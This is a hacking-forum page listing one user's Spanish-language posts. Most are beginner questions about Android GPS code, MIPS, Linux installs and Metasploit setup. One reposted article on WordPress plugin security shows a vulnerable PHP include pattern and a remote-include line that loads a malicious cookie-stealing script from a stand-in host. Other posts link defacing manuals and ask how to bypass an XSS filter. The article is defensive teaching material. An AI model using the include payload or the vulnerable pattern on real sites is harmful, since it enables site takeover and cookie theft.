Temas - Hackmundy

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Hackmundy

Páginas1

Presentaciones y cumpleaños / Hola a todos

Junio 14, 2020, 07:29:51 PM

Hola como estan, buenas tardes, hace años no me conecto

, no es porque no he querido pero la universidad el trabajo me ha impedido seguir aprendiendo de este fantastico mundo,tratare de conectarme mas seguido y ponerme al dia, me gustaria saber si actualmente estan trabajando en un proyecto de programacion en la que pued participar.

saludos

Dudas y pedidos generales / Problema GPS en Android

Octubre 22, 2017, 07:26:37 PM

Hola como esta, he estado aprendiendo android, pero he dado vuelta por toda la red y no encuentro solucion, lo que pasa es que no me actualiza las cordenadas GPS no entra la LocationListener nunca, aparte aveces se cierra la apk. No se que pueda ser ya hice de todo.

Código: php


package com.taxi.taxista;

import android.Manifest;
import android.content.Context;
import android.content.DialogInterface;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.res.Resources;
import android.location.Criteria;
import android.location.Location;
import android.location.LocationListener;
import android.location.LocationManager;
import android.os.Build;
import android.os.SystemClock;
import android.provider.Settings;


import android.support.v4.app.ActivityCompat;
import android.support.v4.app.FragmentActivity;
import android.os.Bundle;
import android.support.v7.app.AlertDialog;

import android.view.View;
import android.widget.Button;
import android.widget.Chronometer;
import android.widget.TabHost;
import android.widget.Toast;

import com.google.android.gms.maps.CameraUpdate;
import com.google.android.gms.maps.CameraUpdateFactory;
import com.google.android.gms.maps.GoogleMap;
import com.google.android.gms.maps.OnMapReadyCallback;
import com.google.android.gms.maps.SupportMapFragment;
import com.google.android.gms.maps.model.BitmapDescriptorFactory;
import com.google.android.gms.maps.model.LatLng;
import com.google.android.gms.maps.model.Marker;
import com.google.android.gms.maps.model.MarkerOptions;

import Conexion.ConexionHTTP;

public class CordenadasMaps extends FragmentActivity implements OnMapReadyCallback, LocationListener {

    private GoogleMap mMap;
    private Marker marcador;
    private LocationManager locationManager;
    //private LocationListener locationListener;
    private double latitud;
    private double longitud;
    private Chronometer reloj;

    private short FlagThear = 0, PrimeraVez = 0;
    private long TIME_HILO = 3000;
    private Button Activ, Desact;
    private String ID;
    AlertDialog alert = null;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_cordenadas_maps);
        // Obtain the SupportMapFragment and get notified when the map is ready to be used.
        SupportMapFragment mapFragment = (SupportMapFragment) getSupportFragmentManager()
                .findFragmentById(R.id.map);
        mapFragment.getMapAsync(this);


        Resources res = getResources();
        TabHost tabs = (TabHost) findViewById(android.R.id.tabhost);
        tabs.setup();

        TabHost.TabSpec spec = tabs.newTabSpec("mitab1");
        spec.setContent(R.id.tab1);
        spec.setIndicator("",
                res.getDrawable(R.drawable.mapa));
        tabs.addTab(spec);

        spec = tabs.newTabSpec("mitab2");
        spec.setContent(R.id.tab2);
        spec.setIndicator("",
                res.getDrawable(R.drawable.taximetro));
        tabs.addTab(spec);

        spec = tabs.newTabSpec("mitab3");
        spec.setContent(R.id.tab3);
        spec.setIndicator("",
                res.getDrawable(android.R.drawable.ic_delete));
        tabs.addTab(spec);

        tabs.setCurrentTab(0);
        Activ = (Button) findViewById(R.id.btn_activar);
        Desact = (Button) findViewById(R.id.btn_desactivar);
        Bundle datos = getIntent().getExtras();
        ID = datos.getString("ID");
        //hilo();
    }

    @Override
    public void onRequestPermissionsResult(int requestCode,String[] permissions,int[] grantResults) {
        //super.onRequestPermissionsResult(requestCode, permissions, grantResults);
        switch (requestCode) {
            case 10:
                VerificaPermiso();
                break;
            default:
                break;
        }
    }

    public void VerificaPermiso() {

        if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED &&
                ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {
            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
                requestPermissions(new String[]{Manifest.permission.ACCESS_FINE_LOCATION, Manifest.permission.ACCESS_COARSE_LOCATION, Manifest.permission.INTERNET}, 10);
            }
            System.out.println("ENTRO AQUI");
            return;
        }
        Criteria criteria = new Criteria();
        criteria.setAccuracy(Criteria.ACCURACY_FINE);
        criteria.setAltitudeRequired(false);
        criteria.setBearingRequired(false);
        criteria.setCostAllowed(true);
        criteria.setPowerRequirement(Criteria.POWER_LOW);
        String provider = locationManager.getBestProvider(criteria, true);
        System.out.println("provider" + provider);
        if (provider != null) {
            locationManager.requestLocationUpdates(provider, 0, 0, CordenadasMaps.this);
        }
    }

    public void setLatLon(double longitud, double latitud) {
        this.longitud = longitud;
        this.latitud = latitud;
        System.out.println("1  " + this.longitud);
        System.out.println("1 " + this.latitud);
    }


    @Override
    public void onMapReady(GoogleMap googleMap) {
        mMap = googleMap;
        System.out.println("1");
        locationManager = (LocationManager) getSystemService(Context.LOCATION_SERVICE);


        mMap.setOnMapLongClickListener(new GoogleMap.OnMapLongClickListener() {
            @Override
            public void onMapLongClick(LatLng latLng) {
                mMap.addMarker(new MarkerOptions()
                        //.icon(BitmapDescriptorFactory.fromResource())
                        .position(latLng));
            }
        });

        mMap.setOnMarkerClickListener(new GoogleMap.OnMarkerClickListener() {
            @Override
            public boolean onMarkerClick(Marker marker) {
                Toast.makeText(getApplicationContext(), "Presiono", Toast.LENGTH_SHORT).show();
                return false;
            }
        });

        //VerificaPermiso();
        checkLocation();
        VerificaPermiso();
        PosicionActual();

        if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED && ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {

            return;
        }
        mMap.setMyLocationEnabled(true);
    }



    @Override
    protected void onPause() {
        super.onPause();
        Criteria criteria = new Criteria();
        criteria.setAccuracy(Criteria.ACCURACY_FINE);
        criteria.setAltitudeRequired(false);
        criteria.setBearingRequired(false);
        criteria.setCostAllowed(true);
        criteria.setPowerRequirement(Criteria.POWER_LOW);
        String provider = locationManager.getBestProvider(criteria, true);

        if(Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
            if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED &&
                    ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {

                if(Build.VERSION.SDK_INT >= Build.VERSION_CODES.M){
                    requestPermissions(new String[]{Manifest.permission.ACCESS_FINE_LOCATION,Manifest.permission.ACCESS_COARSE_LOCATION,Manifest.permission.INTERNET},10);
                }
                return;
            }
            else{
                if (provider != null) {
                    locationManager.removeUpdates(this);
                }
            }

        }
        else{
            if (provider != null) {
                locationManager.removeUpdates(this);
            }

        }


    }

    public void PosicionActual(){
        Location lugar = null;
        Criteria criteria = new Criteria();
        criteria.setAccuracy(Criteria.ACCURACY_FINE);
        criteria.setAltitudeRequired(false);
        criteria.setBearingRequired(false);
        criteria.setCostAllowed(true);
        criteria.setPowerRequirement(Criteria.POWER_LOW);
        String provider = locationManager.getBestProvider(criteria, true);
        System.out.println("provider" + provider);
        if(Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {
            if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED &&
                    ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_COARSE_LOCATION) != PackageManager.PERMISSION_GRANTED) {

                if(Build.VERSION.SDK_INT >= Build.VERSION_CODES.M){
                    requestPermissions(new String[]{Manifest.permission.ACCESS_FINE_LOCATION,Manifest.permission.ACCESS_COARSE_LOCATION,Manifest.permission.INTERNET},10);
                }
                return;
            }
            else{
                if (provider != null) {
                    System.out.println("3");
                    lugar=locationManager.getLastKnownLocation(provider);
                }
            }

        }
        else{
            if (provider != null) {
                System.out.println("3a");
                lugar=locationManager.getLastKnownLocation(provider);
            }

        }
        if(lugar!=null) {
            try {
                setLatLon(lugar.getLongitude(), lugar.getAltitude());
            }catch (Exception e){
                setLatLon(0.0,0.0);
            }
        }
        //agregarmarcador(lugar.getAltitude(),lugar.getLongitude());
        actualizarUbicacion(lugar);
    }

    private void agregarmarcador(double lat, double log){
        LatLng coordenadas = new LatLng(lat,log);
        CameraUpdate miUbicacion = CameraUpdateFactory.newLatLngZoom(coordenadas,16);
        if(marcador!=null)marcador.remove();
        marcador=mMap.addMarker(new MarkerOptions().position(coordenadas)
                .title("Mi posicion Actual")
                .icon(BitmapDescriptorFactory.fromResource(R.mipmap.ic_launcher)));
        mMap.animateCamera(miUbicacion);
    }

    private void actualizarUbicacion(Location location){
        if(location!=null){
            latitud=location.getLatitude();
            longitud=location.getLongitude();
            agregarmarcador(latitud,longitud);
        }
    }

    public void iniciarReloj(View view){
        reloj = (Chronometer)findViewById(R.id.reloj);
        reloj.setBase(SystemClock.elapsedRealtime());
        reloj.start();
    }

    @Override
    public void onBackPressed() {
        //super.onBackPressed();

    }


    @Override
    public void onLocationChanged(Location location) {
        System.out.println("Entro al listener");
        Toast.makeText(getApplicationContext(), "Cambio de posicion", Toast.LENGTH_SHORT).show();
        actualizarUbicacion(location);
        hilo();
    }

    @Override
    public void onStatusChanged(String s, int i, Bundle bundle) {

    }

    @Override
    public void onProviderEnabled(String s) {

    }

    @Override
    public void onProviderDisabled(String s) {
        Intent i = new Intent(Settings.ACTION_LOCATION_SOURCE_SETTINGS);
        startActivity(i);
    }

    public void hilo(){
        System.out.println("ENTRO AL HILO");
        Thread tr = new Thread(){
            @Override
            public void run(){
                while(FlagThear==1) {
                    ConexionHTTP HttpPOST = new ConexionHTTP();
                    try {
                        final String Respuesta = HttpPOST.EnviarDatosGPS(String.valueOf(longitud), String.valueOf(latitud), "http://ecuataxi.grupomeraki.org/php/coordenadas.php",ID);
                        System.out.println("Respuesta: "+Respuesta);
                    }
                    catch (Exception e){

                    }
                    runOnUiThread(new Runnable() {
                        @Override
                        public void run() {

                        }
                    });

                    try {
                        Thread.sleep(TIME_HILO);
                    } catch (InterruptedException e) {
                        e.printStackTrace();
                    }

                }
            }
        };
        if(PrimeraVez==0) {
            tr.start();
            PrimeraVez=1;
        }
    }

    public void Activar(View view){
        FlagThear=1;
        PrimeraVez=0;
        //hilo();
        Activ.setEnabled(false);
        Desact.setEnabled(true);
    }

    public void Desactivar(View view){
        FlagThear=0;
        Activ.setEnabled(true);
        Desact.setEnabled(false);
    }

    private boolean checkLocation() {
        if (!isLocationEnabled())
            AlertNoGps();
        return isLocationEnabled();
    }

    private void showAlert() {
        Thread tr = new Thread() {
            @Override
            public void run(){
                while(true) {
                    final AlertDialog.Builder dialog = new AlertDialog.Builder(CordenadasMaps.this);
                    dialog.setCancelable(false);
                    dialog.setTitle("Enable Location")
                            .

                                    setMessage("Su ubicación esta desactivada.\npor favor active su ubicación " +
                                            "usa esta app")
                            .

                                    setPositiveButton("Configuración de ubicación", new DialogInterface.OnClickListener() {
                                        @Override
                                        public void onClick(DialogInterface paramDialogInterface, int paramInt) {
                                            Intent myIntent = new Intent(Settings.ACTION_LOCATION_SOURCE_SETTINGS);
                                            startActivity(myIntent);
                                            return;
                                        }
                                    })
                            .

                                    setNegativeButton("Cancelar", new DialogInterface.OnClickListener() {
                                        @Override
                                        public void onClick(DialogInterface paramDialogInterface, int paramInt) {
                                            return;
                                        }
                                    });
                    dialog.show();
                }
            }
        };
        tr.start();
    }

    private boolean isLocationEnabled() {
        Criteria criteria = new Criteria();
        criteria.setAccuracy(Criteria.ACCURACY_FINE);
        criteria.setAltitudeRequired(false);
        criteria.setBearingRequired(false);
        criteria.setCostAllowed(true);
        criteria.setPowerRequirement(Criteria.POWER_LOW);
        String provider = locationManager.getBestProvider(criteria, true);
        if(provider!=null){
            return locationManager.isProviderEnabled(provider);
        }else {
            return locationManager.isProviderEnabled(LocationManager.GPS_PROVIDER) ||
                    locationManager.isProviderEnabled(LocationManager.NETWORK_PROVIDER);
        }
    }


    private void AlertNoGps() {
        Thread hil = new Thread() {
            @Override
            public void run(){
                final AlertDialog.Builder builder = new AlertDialog.Builder(CordenadasMaps.this);
                builder.setMessage("El sistema GPS esta desactivado, ¿Desea activarlo?")
                        .setCancelable(false)
                        .setPositiveButton("Si",new DialogInterface.OnClickListener() {
                                    public void onClick ( @SuppressWarnings("unused") final DialogInterface dialog,
                                                          @SuppressWarnings("unused") final int id){
                                        startActivity(new Intent(android.provider.Settings.ACTION_LOCATION_SOURCE_SETTINGS));
                                    }
                                })
                        .setNegativeButton("No",new DialogInterface.OnClickListener() {
                                    public void onClick ( final DialogInterface dialog,
                                                          @SuppressWarnings("unused") final int id){
                                        dialog.cancel();
                                    }
                                });
                alert =builder.create();
                alert.show();
            }
        };
        hil.start();
    }

    @Override
    protected void onDestroy(){
        super.onDestroy();
        if(alert != null)
        {
            alert.dismiss ();
        }
    }
}

Disculpen mi idnorancia.

Dudas y pedidos generales / Android Studio en archlinux

Mayo 01, 2017, 03:48:35 PM

Hola a todos como están, tengo un problemita al instalar el android studio, y crear un nuevo proyecto me sale esto:

Código: php

error=13, Permission denied

le he dado permisos con chmod al programa y la carpeta del proyecto pero al crear el grande sale eso..

Disculpen las molestias.

Dudas y pedidos generales / [SOLUCIONADO] Qué debo leer para hacer un codigo de bluetooth en C

Septiembre 23, 2016, 06:09:51 AM

Hola como estan debo hacer un codigo que busque los dispocitivos cercanos mediante bluetooth y que se emparejen, pero no tengo ni la remota idea como empezar alguien me podria ayudar diciendo los temas que debo leer ya que en google no he encontrado mucha informacion..

saludos.

Dudas y pedidos generales / como empaquetar todo (librerias,.c,etc)en un .out en C

Septiembre 18, 2016, 06:37:50 PM

Hola como estan no entiendo aun mucho de los makefile, pero me gustaria saber como puedo unir todas las librerias y codigo fuente usadas en .out.

SALUDOS y disculpen mi idnorancia.

Dudas y pedidos generales / [SOLUCIONADO] Cómo declarar un vector de interos en mips32|sintaxis del for

Septiembre 10, 2016, 01:11:40 AM

Hola como estan disculpen por molestar, me gustaria ayudar como declara un vector de interos en mips32, y la sintaxis del for:

data
A: .space 100 #vector A de 100

pero no funciona e estado leyendo y solo dice que es para reservar memoria pero como declaro un vector de int ya que con char es asi:
rosa: .asciiz "ROZA \n"
pedro: .asciiz "pedro \n"
andres: .asciiz "andres \n"
names: .word rosa,pedro,andres

con respecto al for :

bucle:
#bloque del for
bge $t3, 100, fin_bucle

lw $t0,($s0) #a
lw $t1,$t3,($s1) #b
add $s2,$t1,$s3 #b+c
sw $t0,$t3($s0) #a=b+c;

addi $t1, $t1, 1 #aumentamos el contador
blt $t1, 100, bucle #salta si el contenido de $t1 es menor que 100
fin_bucle:

salidos

Seguridad / Seguridad de Plugins WordPress: ¿Que es peligroso?

Marzo 03, 2013, 11:52:48 AM

Hola hoy les traigo esta Info que encontre. Hemos establecido que la regla de oro en la seguridad web es comprobar los "gateways". Y esto es vigilar las áreas de un sitio web que un atacante podría utilizar para enviar datos a tu web. Me gustaría ahondar mas en esto hoy.

El experto en soporte WordPress, Podz, pregunta en su blog, "¿Que es peligroso?"

La respuesta está en comprender los vectores de ataque. Los vectores de ataque, tales como Scripts Cruzados, Inyecciones SQL e Inclusión de Fichero Remoto, son algunos de los métodos mas utilizados para atacar una web. Si entiendes los principios en los que se basan tendrás una mayor comprensión de lo que necesitas buscar en un plugin. Así que vamos a ello ¿no crees?.

Scripts Cruzados (XSS)

Los Scripts Cruzados han sido descritos por Network World como la "mayor amenaza de seguridad". Scripts Cruzados es un término general que se refiere a la inyección de javascript en una página. Y como la zona javascript permite al navegador hacer una amplia variedad de cosas, incluyendo el potencial de ejecutar código en el sistema de archivos, permitir a un atacante un vector para conseguir meter ese código en tu ordenador o web es peligroso. Un ejemplo de XSS sería el fallo de Democracy 1.2. Un punto común de entrada de un XSS es un formulario HTML (formulario de contacto, tagboard, etc) o la barra de direcciones.

Inyección SQL

Desde un punto de vista de programación, la inyección SQL ocurre cuando la entrada desde el navegador (ya sea desde un formulario o la barra de direcciones o lo que sea) se filtra inadecuadamente para hacerla "segura" y luego alimenta directamente una base de datos. Este vector de ataque permitiría que el contenido de una web (que esté apoyado en bases de datos) sea alterado o incluso borrado. Podría también utilizarse en combinación con XSS para inyectar javascript malicioso o scripts de servidor en el contenido de una página.

Inclusión de Fichero Remoto

Un tercer vector de ataque que debería evitarse es la inclusión de fichero remoto. Esto es utilizar una función PHP ( <a href="No tienes permitido ver los links. Registrarse o Entrar a mi cuenta</a>) para insertar una pieza de código alojado en cualquier sitio y ejecutado en el servidor remoto. En otras palabras, un atacante puede escribir un pequeño script que registre direcciones IP, cookies, etc, y si puede incluir en la web un script PHP de su sitio, puede ofrecer información valiosa al atacante. La IFR suele encontrarse normalmente cuando una entrada de usuario (formulario, barra de direcciones) se incluye directamente en un include().

Por ejemplo, un enlace de este tipo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta poddría tener algún código que facilite el contenido adecuado <?php include($_GET['page'].".php"); ?>. Este tipo de código descuidado es mas habitual de lo que te imaginas. La intención del desarrollador podría ser, en este ejemplo, incluir los contenidos de about.php en la página principal. Sin embargo, piensa que pasaría si mando esta petición a mi navegador:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Entonces, su página estaría ejecutando en realidad esta orden:

Código: php

< ?php include("http://midominio.com/script_lectura_cookie_maliciosa.php"); ?>

Un asunto muy peligroso.

¿Como afecta esto a WordPress?

En los siguientes artículos de esta serie echaremos un vistazo a las implicaciones de seguridad específicas a los plugins de WordPress. Cualquier plugin que se use debería inspeccionarse inicialmente para ver si permite la interacción con el usuario. Si permite la interacción del usuario podría ser propenso a uno de estos ataques de vectores. No asumas, no obstante, que un plugin que acepte interacción es peligroso. Es cuestión del código y el desarrollador ofrecer una entrada de usuario apropiada y segura.

Saludos..

Bugs y Exploits / Los 3 modos más comunes de hackear WordPress y cómo evitarlo

Marzo 03, 2013, 11:48:06 AM

WordPress es ya el CMS más utilizado y popular, y ese poder conlleva una responsabilidad, la de ser también el CMS más atacado por hackers que quieran hacerse con el control de tal o cual web ... hecha con WordPress. Y no te creas que si tu WordPress no es una web popular no sufrirá ataques, pues muchos de los "exploits" que se crean son para hacer webs zombie, y para eso les vale cualquiera.

De todos los modos que hay de hackear una web, los 3 que más se dan en WordPress, las principales vías de entrada para ataques, son las siguientes:

1. Temas y plugins sin actualizar

Instalar y actualizar temas y plugins en WordPress es muy fácil, y con el sistema de avisos de nuevas versiones integrado, salvo situaciones especiales, no hay motivos para no actualizarlos cuando hay nuevas versiones. Además, la mayoría de las actualizaciones suelen ser por cuestiones de seguridad que podrían poner en peligro tu web, salvo cuando hay un cambio de versión mayor en WordPress, que entonces obliga a cambiar ciertos códigos en algunos plugins y temas. El resto de las ocasiones, especialmente en los temas, es prácticamente obligatorio actualizarlos.

Muchas veces hablamos de la conveniencia – o no – de los plugins y temas de pago, y una de sus ventajas debe ser el aliciente para el desarrollador de estar pendiente de nuevos ataques o "exploits" y actualizar su producto para solucionarlos, algo que con los temas y plugins gratuitos no siempre es así.
Soluciones

CitarMantén actualizado WordPress a la última versión
Mantén actualizados los plugins WordPress
Mantén actualizados los temas WordPress
Aprende los peligros de los plugins WordPress

Fácil ¿no?

2. Datos de acceso débiles

Actualmente puedes elegir el nombre de usuario administrador al instalar WordPress, y sino cambiarlo nada más terminar la instalación, pero aún hay muchos WordPress con el usuario por defecto de nombre admin, y con eso cualquier intruso ya tiene la mitad de la información para acceder a tu WordPress como administrador.

Si a esto le sumas una contraseña simple, fácil de adivinar o que uses en otros servicios online no siempre seguros, estás más que expuesto a posibles accesos no deseados. Es algo que debes solucionar lo antes posible.
Soluciones

CitarCambia el nombre de usuario admin lo antes posible
Cambia la URL de login de WordPress como medida adicional
Evita dar pistas a hackers en el login
Limita los intentos de acceso

3. Inyecciones en la base de datos

Este es quizás el método más empleado últimamente para hackear cualquier CMS, WordPress incluido, y lo malo es que no siempre depende de ti que las bases de datos estén seguras, pero al menos hemos de hacer nuestro trabajo para asegurarlas lo máximo posible.

Lo peor es que si un hacker entra en tu base de datos estás perdido del todo, puede hacer lo que sea, no hay límites. Además, luego limpiar una base de datos infectada es un absoluto horror, de lo peor que te puede ocurrir.
Soluciones

CitarCambia el prefijo de tu base de datos
Protege el archivo .htaccess
Usa htaccess como firewall

Y hasta aquí las 3 maneras más comunes en que suele haber hackeos de WordPress. Vamos a ver si tenemos ayudas genéricas ...

Avisos de seguridad de Google

Es horrible cuando visitamos una web y Google nos avisa de que es insegura y puede infectar nuestro sistema, pero para el webmaster es, al menos, un aviso de que algo ha pasado.

Para ello es fundamental que tengas una cuenta en Google Webmaster Tools para gestionar ahí tus webs y poder tener avisos de seguridad e incluso instrucciones de como solucionar intrusiones. Además, Google ya te avisa incluso de cuando tienes que actualizar WordPress.

Luego, en su mismo panel puedes avisarle a Google de que tu sitio está limpio y quitará, tras comprobarlo, el molesto aviso.

¿Cómo evitar problemas de seguridad en WordPress?

Todo esto, como ves está muy bien pero ¿como evito este tipo de intrusiones, hackeos e inyecciones de código?, pues siendo exhaustivo en los básicos, que no me cansaré de repetir:

CitarMantener WordPress actualizado a la última versión, única garantía de control de vulnerabilidades conocidas.
Instalar solamente plugins seguros, a ser posible desde el repositorio oficial.
Instalar solamente temas seguros, a ser posible desde el repositorio oficial.
Asegura WordPress con plugins especializados
Revisar la sección de seguridad de Ayuda WordPress para comprobar que has realizado todas las acciones de seguridad necesarias.
Suscribirte al feed de Ayuda WordPress para estar informado de las alertas de seguridad.

Servicios WordPress seguros

Ahora bien, si no quieres preocuparte de la seguridad de tu WordPress, siempre puedes recurrir a servicios que te quiten de problemas:

CitarUtiliza un WordPress administrado como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, simplemente escribes y te olvidas de todo
Haz backup de todo, tienes muchos plugins que automatizan las copias de seguridad diarias, para casos de desastre
Contrata un hosting especializado en WordPress que haga copia de seguridad automática de tu sitio
Install a premium plugin which automatically creates a full backup and sends it to a storage location of your choice.

Bueno esto es Todo Espero que les Guste...

Saludos...

Dudas y pedidos generales / [SOLUCIONADO] Alguien me ayuda un buen manual para aprender a usar vultimetro

Enero 29, 2013, 11:35:47 AM

Hola como estan espero no molestar me gustaria saber si me podrian ayudar con un manual para aprender a usar un voltimetro pero bien e leido en google algunos e aprendido algo pero no son tan explicito por eso me gustaria saber si me podrian ayudar con un manual, si no es mucha molestias....

Saludos...

#10

Wargames y retos / SQLI Basica Facil

Enero 19, 2013, 01:49:02 AM

Hola bueno Hoy les Traigo esta SQLI Basica digo basica ya que lo e echo yo un novato... Espero que les Guste...

Ganadores:

Hackmundy

1.- WilyXem
2.- BCKTR1X
3.- Dedalo
4.- Expermicid
5.- overxfl0w13
6.- Cronos
7.- TUNOVATO
8.- Jimeno
9.- arthusu
10.- RandomSoft
11.- Hu0r
12. THUGZKEERHH

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Me envian Por MP como lo hicieron....
EDITO:

Bueno, he cambiado de host espero que no haya problema con este. La pass debe ingresarla en MD5

Saludos.....

#11

Wargames y retos / Acceso a la WEB Facil

Enero 19, 2013, 01:25:08 AM

Hola como estan Hoy les Traigo este reto de Acceso a La web espero que les guste...

Ganadores:

1.- D4KR0
2.- 11Sep
3.-
4.-
5.-

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Me envian un MP como lo hicieron....

EDITO:

Reto subido a otro host

Saludos...

#12

Cursos, manuales y libros / Manuales de Defacing

Enero 12, 2013, 09:47:18 PM

Hola hoy les traigo manuales de defacing....

Que es Defacing?

El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma.
La mayoria de las veces logran defacear un sitio consiguiendo acceso mediante alguna vulnerabilidad que el programador haya dejado en el mismo.
También por passwords debiles, problemas en el FTP, etc.

Cómo prevenir un deface ? Es sencillo seguí con los standares de seguridad, no creas que por que "Tu cliente" o tu "Página" no van a tener visitas, no habrá alguien que pueda joderte.
Las mejores tecnicas son las que anteriormente pasé con ereg, etc.etc. Pero son las básicas, hay más y mejores técnicas que vamos desarrollando día a día para que los chistosos no puedan pasarnos por alto. (La principal es comprobar que solo pasen por las variables los datos que NOSOTROS QUEREMOS y no los que EL USUARIO QUIERA).

Si deseas aprender de este mundo aca te dejo los manuales que estoy siguiendo:

EDITO

Sqli
Sql
xss
rfi
etc
Vulnerabilidades web

Estos manuales no son profesionales es decir no te haran experto, pero te daran conocimientos..

Manual defacing

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#13

Dudas y pedidos generales / [SOLUCIONADO] Ayuda con htmlentities() forma de explotarlo

Enero 10, 2013, 12:01:20 PM

Hola e estado practicando y e dado que con htmlentities() evita que se utilizen codigo html en un formulario evitando asi un xss me gustaria saber si hay una forma de explotarlo e leido en google y me a salido que esta en utf y hay que ponerlo asi lo e puesto pero no funciona e intentado algunas formas que e buscado y filtros tambien pero nada...

Código: php

$p= htmlentities($_POST['forulario']);
echo $p

Saludos y disculpen mi idnorancia...

#14

Dudas y pedidos generales / [SOLUCIONADO] Problema en Instalacion Sistema Operativo Hardware

Enero 02, 2013, 10:15:05 PM

Hola a todos tengo un problemas hace dias e intentado solucionarlo pero no e encontrado la solucion:

Lo que pasa que instale open suse en mi netbook luego me di cuenta que ese SO era una peste y quise volver a instalar mi debian pero ya no pude al hacer un usb booteable con debian hago lo siguiente:

1.- La Netbook esta apagada
2.- Meto el USB
3.- Prendo la pc
4.- Me sale este error:
Intel (R) Pineview PCI Acelerated SVGA Bios
Build Number: 1818 PC 14.34 06/19/2009 01:29:40
Decompilation or Disassembly Prohibited Copyright (C) 2000 - 2003 Intel Corp. All Rights Reserved

Y no me deja hacer nada no me deja ni instalar, por favor ayudenmen estoy desesperado...

Saludos y disculpen si molesto

#15

Dudas y pedidos generales / [SOLUCIONADO] Otra ves Molestando perdonenme

Diciembre 30, 2012, 01:00:13 AM

Hola bueno disculpen, mi duda es la siguiente e estado leyendo el curso de craking de ricardo narvajo pero me e dado cuenta que solo es para windows me gustaria saber lo siguiente.

1.- Se puede practicar el craking en linux
2.- Con que programas
3.- el lenguaje ensamblador el mejor para linux e leido por google pero muchos dicen uno otros dicen otro me gustaria saber cual seria el mas apropiado..

Saludos y disculpen mi novatada...

#16

Dudas y pedidos generales / [SOLUCIONADO] Duda error de imagen.

Diciembre 22, 2012, 01:31:49 AM

Hola como estan disculpen mi duda tonta es que siempre e tenido problemas de saber como puedo ver una imagen si dice:

CitarNo se puede mostrar la imagen "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta..com/img.gif" porque contiene errores

me gustaria saber que leo para saber como resolverlo se que es estenografia pero segun el editor hexadecimal me tira muchas cosas...

Saludos..

#17

Dudas y pedidos generales / [SOLUCIONADO] Duda sobre instalacion de Metasploit

Diciembre 08, 2012, 01:40:32 AM

Hola a todos disculpen no se si este bien posteando aqui si hice mal pido disculpa, bueno mi duda es la siguiente:

1.- Al instalar metasploit me pide si deseo que sea un servicio que pongo si o no
2- Me pide un puerto puedo poner cualquiera o es necesario dejar el de defaul
3.- Eso de enviar estadisticas anonimas es obligacion o no

Disculpen mi idnorancia, espero no molestar...
Saludos...

#18

Dudas y pedidos generales / Problema con la Instalacion de SVN Subversiones.

Abril 12, 2012, 12:12:26 AM

Hola a toda la comunidad espero no molestarlos he tratado de instalar SNV Subversiones con este tutorial No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pero no he podido avanzar. He llego hasta la instalacion del apache pero no me sale nada solo la error de conexion, he utilizado el appserv como apache pero no pasa nada tambien me dio una duda que no se si esto es asi "/" o asi "\" en algunos pedasos aparece uno y despues el otro y hay me confundo no se si estara mal tipiado o sera asi pero lo he puesto como esta en el tuto, tambien en este pedaso de codigo:

Código: php

LoadModule dav_svn_module "D:/servidores/Subversion/bin/mod_dav_svn.so"
LoadModule authz_svn_module "D:/servidores/Subversion/bin/mod_authz_svn.so"

No se si va con comillas o sin comillas. en el tuto se repiten las dos dos veces..

tambien he intentado con el snvserver.exe y TortoiseSVN-1.7.6.22632-win32-svn-1.7.4.msi para no usar el apache pero no me funciona, no se a que se deba o que pasa malo que hago..
Espero que me puedan ayudar y si cause mas confucion pido disculpa De antemano Gracias..

Saludos..

#19

Redes y antenas / Curso de Redes Windows / Linux

Abril 07, 2012, 09:54:02 PM

Redes de Área Local. Aplicaciones y servicios. Windows / Linux

Hola este es mi primer topic y mi primer aporte para la comunidad, no he tenido la oportunidad de descargarlo aun porque mi wifi es de 512 kb se demora mucho , pero segun el contenido se ve muy bueno , les Traigo un curso de Redes gracias a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, En los centros educativos ya disponemos de redes locales que nos permiten compartir carpetas, compartir impresoras y que todos nuestros PCs estén conectados a Internet. Este curso pretende dar un paso más: incrementar los servicios de la red local. De la misma forma que en Internet disponemos de servidores WEB, servidores FTP, etc., se pretende dotar a nuestra red de servicios adicionales que faciliten su uso y aumenten sus prestaciones.

Este curso está destinado al profesorado que habiendo realizado el curso de Redes en la Educación o que teniendo ya conocimientos de redes, desee realizar la explotación final de una red, mediante un esquema cliente-servidor y utilizando el sistema operativo Windows o el sistema operativo Linux.

